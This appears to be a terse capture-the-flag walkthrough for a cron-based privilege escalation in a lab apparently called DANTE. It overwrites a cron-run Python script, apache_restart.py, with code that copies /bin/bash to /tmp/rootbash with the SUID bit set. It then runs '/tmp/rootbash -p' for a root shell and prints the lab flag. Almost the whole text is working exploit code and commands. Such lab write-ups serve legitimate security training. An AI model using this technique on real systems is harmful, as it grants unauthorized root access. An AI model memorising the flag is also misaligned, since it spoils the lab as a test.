rm apache_restart.py
vim apache_restart.py
Python cron exploit / python suid/ python rootbash
import shutil
import os
import stat
source = '/bin/bash'
destination = '/tmp/rootbash'
# Copy the file
shutil.copy(source, destination)
# Change the permission of the file
os.chmod(destination, stat.S_ISUID | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)
Wait for the cron job
Get root shell
chmod +x apache_restart.py
/tmp/rootbash -p
Getting the flag
rootbash-5.0# cat flag.txt
DANTE{L0v3_m3_S0m3_H1J4CK1NG_XD}